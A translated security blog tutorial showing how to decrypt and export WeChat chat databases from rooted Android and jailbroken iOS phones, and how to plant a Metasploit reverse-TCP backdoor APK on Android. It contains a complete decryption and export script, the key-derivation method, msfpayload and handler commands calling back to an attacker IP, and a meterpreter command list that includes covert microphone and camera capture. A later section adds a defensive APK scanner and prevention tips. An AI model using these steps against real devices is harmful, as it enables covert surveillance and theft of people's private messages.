How to obtain WeChat chat records on Android and iOS, and control Android through Metasploit

In this article we will look at how to obtain WeChat chat records from Android and Apple devices, and demonstrate how a backdoor can be used to control an Android device through Metasploit. The article is fairly basic and hands-on; readers with a device can follow along while reading, in the hope of sparking your interest in mobile security.

“How do I get the WeChat chat records from an Android or iPhone phone?”

0×00 Prerequisites:

Android device rooted, with SSHDroid installed (to connect to the phone over ssh/ftp)

Apple device jailbroken, with the OpenSSH package installed

0×01 Android:

Many Android users run into the same awkward problem: after a while the phone quietly gets slower and slower, until eventually everything feels sluggish. To fix this I, like most people, chose to root the device.

Once an Android device is rooted you have the highest level of access to its system files. For example, if WeChat is installed on the device, after rooting you can read and modify the WeChat app's files and settings through adb shell.

Android apps usually keep their database files under /data/data/packagename/database; the WeChat app's files are stored at /data/data/com.tencent.mm/MicroMsg

First, download the files to the local machine over FTP:

In the folder whose name is a 34-character code (it looks like random characters) you will find the encrypted database file for the WeChat account: EnMicroMsg.db

Opening it with a database manager: it reports that the file is encrypted or is not a database

Here we can open it with SQLite Database Browser on Windows:

It prompts for a password:

<int name="default_uin" value="146***21" />

The uin values found by the two methods above are the same.

Dial *#06# on the Android dialer to get the phone's IMEI: 354********85

Combining the SIM value with the uin value gives 146***21354********85

md5: http://www.spriteking.com/cmd5/ (use the encrypt box on the right)

This gives the 32-character lowercase md5 value a1edf9f5********************b5e5; take its first seven characters, a1edf9f, and enter them in the SQL browser.

Linux and Mac users can also run this in a terminal:

echo -n "146***21354********85" | md5sum | cut -c -7

WeChat's database file now opens successfully:

Wechat2txt.py:gist.github.com

import csv
import getopt
import hashlib
import locale
import os
import re
import subprocess
import sys
import time


def get_db():
    """Locate EnMicroMsg.db on the device through adb (requires a rooted device)."""
    os.popen('adb root').close()
    text = os.popen(
        'adb shell ls /data/data/com.tencent.mm/MicroMsg/*/EnMicroMsg.db').read()
    return text.splitlines()[-1] if text else ''


def get_default_uin():
    """Read the account uin from WeChat's shared preferences file."""
    os.popen('adb root').close()
    text = os.popen(
        'adb shell cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml').read()
    default_uin = re.findall(r'name="default_uin" value="([0-9]+)"', text)
    return default_uin[0] if default_uin else 0


def get_device_id():
    """Read the device IMEI from dumpsys."""
    text = os.popen('adb shell dumpsys iphonesubinfo').read()
    device_id = re.findall(r'Device ID = ([0-9]+)', text)
    return device_id[0] if device_id else 0


def get_md5():
    """Database key: the first 7 hex characters of md5(IMEI + uin)."""
    default_uin = get_default_uin()
    device_id = get_device_id()
    if default_uin and device_id:
        return hashlib.md5((device_id + default_uin).encode()).hexdigest()[:7]
    return ''


def parse_msgcsv(msgcsv):
    """Yield [talker, time, sender, content, img_path] rows from the exported CSV."""
    locale.setlocale(locale.LC_ALL, '')
    if hasattr(msgcsv, 'title'):  # a single string: split it into lines for csv.reader
        msgcsv = [line + '\n' for line in msgcsv.splitlines()]
    reader = csv.reader(msgcsv)
    next(reader)  # skip the header row
    for row in reader:
        try:
            (msg_id, msg_svr_id, msg_type, status, is_send, is_show_timer,
             create_time, talker, content, img_path, reserved, lvbuffer) = row[:12]
        except ValueError:  # malformed or short row
            continue
        sender = 'me' if is_send == '1' else talker
        struct_time = time.localtime(int(create_time) / 1000)
        time_str = time.strftime('%Y-%m-%d %a %H:%M:%S', struct_time)
        yield [talker, time_str, sender, content, img_path]


def get_names(chat):
    """Return the distinct talker names in the parsed chat."""
    names = {}
    for talker, time_str, sender, content, img_path in chat:
        names[talker] = 1
    return list(names.keys())


def chat_to_text(chat, name=''):
    """Render the chat as text; an empty name dumps everything, otherwise one talker only."""
    text = []
    name = name.lower()
    for talker, time_str, sender, content, img_path in chat:
        content = content.replace('\n', '\n  ')
        img_path = ('\t' + img_path) if img_path else ''
        if not name:
            text.append('%s: %s %s: %s %s' % (talker, time_str, sender, content, img_path))
        elif talker.lower() == name:
            text.append('%s %s: %s %s' % (time_str, sender, content, img_path))
    return '\n'.join(text) + '\n'


def run_sqlcipher(dbn, script):
    """Feed a script to the sqlcipher command-line tool and return its stdout."""
    proc = subprocess.run(['sqlcipher', dbn], input=script,
                          capture_output=True, text=True)
    return proc.stdout


def list_tables(dbn, key=''):
    """List the tables of the (SQLCipher-encrypted) database."""
    script = ''
    if key:
        script += 'PRAGMA key=%r;\n' % key
        script += 'pragma cipher_use_hmac=off;\n'
    script += '.tables\n'
    return run_sqlcipher(dbn, script).split()


def decrypt(dbn, key='', table='message'):
    """Dump one table of the database as CSV text."""
    table = table or 'message'
    script = '.header on\n.mode csv\n'
    if key:
        script += 'PRAGMA key=%r;\n' % key
        script += 'pragma cipher_use_hmac=off;\n'
    script += 'select * from %r;\n' % table
    return run_sqlcipher(dbn, script)


def wechat2txt(names=()):
    """Pull, decrypt and export the message table; returns 1 on failure, None on success."""
    in_file = 'EnMicroMsg.db'
    out_file = 'message.csv'
    db = get_db()
    md5 = get_md5()
    os.popen('adb wait-for-device').close()
    os.popen('adb pull %s %s' % (db, in_file)).close()
    msgcsv = decrypt(in_file, md5)
    if msgcsv.find('\n') < 0:
        return 1
    with open(out_file, 'w') as f:
        f.write(msgcsv)
    msgs = list(parse_msgcsv(msgcsv))
    if not msgs:
        return 1
    if not names:
        names = get_names(msgs)
    for name in names:
        filename = 'message.%s.txt' % name
        text = chat_to_text(msgs, name)
        if len(text) > 4:
            with open(filename, 'w') as f:
                f.write(text)


help_msg = '''Usage: wechat2txt.py [OPTIONS] [NAME]...
OPTIONS:
    -h        display this help and exit'''


def main():
    try:
        opts, args = getopt.getopt(sys.argv[1:], 'h')
    except getopt.error:
        print(help_msg)
        return 1
    for opt, arg in opts:
        if opt == '-h':
            print(help_msg)
            return 1
    names = args
    # exit status 1 only when wechat2txt reports a failure
    return wechat2txt(names) or 0


if __name__ == '__main__':
    sys.exit(main())

0×02 Apple:

After jailbreaking, an Apple device can install all kinds of small packages through Cydia. I normally install OpenSSH so that I can connect to the Apple device from a terminal and transfer files with sftp:

On iOS, app folders are named with hash values, so exporting WeChat or QQ chat records is somewhat more cumbersome than on Android.

In practice we can work around these obstacles with a bit of clever use of Linux commands (find, grep, xargs).

find /var/mobile/Containers/Data -name "MM.sqlite"
mkdir /cache
find /var/mobile/Containers/Data -name "MM.sqlite" | xargs -I {} dirname {} | xargs -I {} cp -r {}/../../ /cache

For taking private data from a jailbroken iOS device, see the article "An unexpected discovery while fixing a girl's phone: private data hidden in the iOS file system".

0×03 Planting a backdoor on an Android device

3.1 Lab environment

Kali Linux (attacker): 192.168.31.213

Android (target): 192.168.31.118

3.2 Generate the backdoor file:

cd Desktop
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.31.213 LPORT=443 R > 0xroot.apk

3.3 Run the Metasploit console

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.31.213
set LPORT 443
run

3.4 Install & run the backdoor app

What can the backdoor do? Let's look at the usage:

meterpreter > help

Core commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam

record_mic: eavesdrop and record through the phone's microphone; webcam_list: list all cameras on the Android device; webcam_snap: take covert photos through the camera … and so on.

0×04 Demo video

0×05 APK backdoor analysis:

Load the apk into an apk analysis tool (apkStudio, Bytecodeviewer) to unpack it, and let's look at the backdoor app's source code:

(screenshot: apkStudio)

In smali/com/metasploit/stage/MainActivity.smali we can find the backdoor server's IP and port configuration:

(screenshot: apkStudio)

(screenshot: Bytecodeviewer)
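The screenshots above locate the stager's package path by hand in apkStudio and Bytecodeviewer. As an added example from the defender's side (not code from the original article or from Metasploit), the Python script below automates that check: it opens an APK as a zip archive, scans every classes*.dex entry for the com/metasploit/stage class path the article points at, and reports any IPv4:port strings stored next to it. STAGER_MARKERS, build_fake_apk and the two sample DEX byte strings are constructed for this demo and are assumptions of the example; a real DEX file has a binary header that this string scan deliberately does not parse.

```python
import io
import re
import zipfile

# Class-path markers for the Metasploit Android stager. The article shows the
# stager living at smali/com/metasploit/stage/MainActivity.smali; in a DEX
# string pool the same class appears as "Lcom/metasploit/stage/MainActivity;".
STAGER_MARKERS = [
    b"com/metasploit/stage",
    b"Lcom/metasploit/stage/MainActivity;",
]

# IPv4 address followed by a port, as a hard-coded callback would be stored.
HOST_PORT_RE = re.compile(rb"\d{1,3}(?:\.\d{1,3}){3}:\d{1,5}")

# Constructed sample DEX contents (string pool only, no real DEX header).
# The callback address is the Kali host from the article's lab setup.
SAMPLE_STAGER_DEX = (
    b"dex\n035\x00Lcom/metasploit/stage/MainActivity;\x00"
    b"Lcom/metasploit/stage/Payload;\x00tcp://192.168.31.213:443\x00"
)
SAMPLE_CLEAN_DEX = (
    b"dex\n035\x00Lcom/example/notes/MainActivity;\x00https://example.org/api\x00"
)


def build_fake_apk(dex_payload: bytes) -> bytes:
    """Hypothetical helper: wrap a classes.dex blob in a minimal APK-like zip (in memory)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"<manifest/>")
        zf.writestr("classes.dex", dex_payload)
    return buf.getvalue()


def scan_apk(apk_bytes: bytes) -> dict:
    """Scan every classes*.dex in an APK for stager markers and embedded host:port strings."""
    hits = []
    hosts = set()
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for entry in zf.namelist():
            # APKs may split code across classes.dex, classes2.dex, ...
            if not (entry.startswith("classes") and entry.endswith(".dex")):
                continue
            data = zf.read(entry)
            for marker in STAGER_MARKERS:
                if marker in data:
                    hits.append((entry, marker.decode()))
            for match in HOST_PORT_RE.finditer(data):
                hosts.add(match.group(0).decode())
    return {"suspicious": bool(hits), "hits": hits, "hosts": sorted(hosts)}


def demo() -> tuple:
    """Run the scanner over the constructed stager-like and clean APKs."""
    stager = scan_apk(build_fake_apk(SAMPLE_STAGER_DEX))
    clean = scan_apk(build_fake_apk(SAMPLE_CLEAN_DEX))
    return stager["suspicious"], clean["suspicious"]


if __name__ == "__main__":
    result = scan_apk(build_fake_apk(SAMPLE_STAGER_DEX))
    print("suspicious:", result["suspicious"])
    for entry, marker in result["hits"]:
        print("  %s contains %s" % (entry, marker))
    print("  embedded host:port strings:", result["hosts"])
```

To use it on a real file, pass `open("app.apk", "rb").read()` to scan_apk. The host:port regex is only a triage aid: a stager that encodes or obfuscates its callback address will not produce a hosts entry, so treat the class-path hit, not the address, as the signal.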

0×06 Prevention & security advice

Android: download apps only from trusted sources to avoid infection by malicious apps; turn off USB debugging before charging at a public charging station.

Apple: change the root password promptly after jailbreaking; do not keep the default password or use a weak one.

0×07 Download links for the tools used in this article:

SQLite Database Browser: http://pan.baidu.com/s/1nuWlDgd

SSHDroid: http://pan.baidu.com/s/1b6PBK6

0×08 References & acknowledgements

How To Decrypt WeChat EnMicroMsg.db Database?

Android WeChat data export

WeChat chat record analysis

A look at WeChat security

https://gist.github.com/scturtle/7248017

An unexpected discovery while fixing a girl's phone: private data hidden in the iOS file system

Hacking Android Smartphone Tutorial using Metasploit

[via @雪碧0xroot, 漏洞盒子 security team]
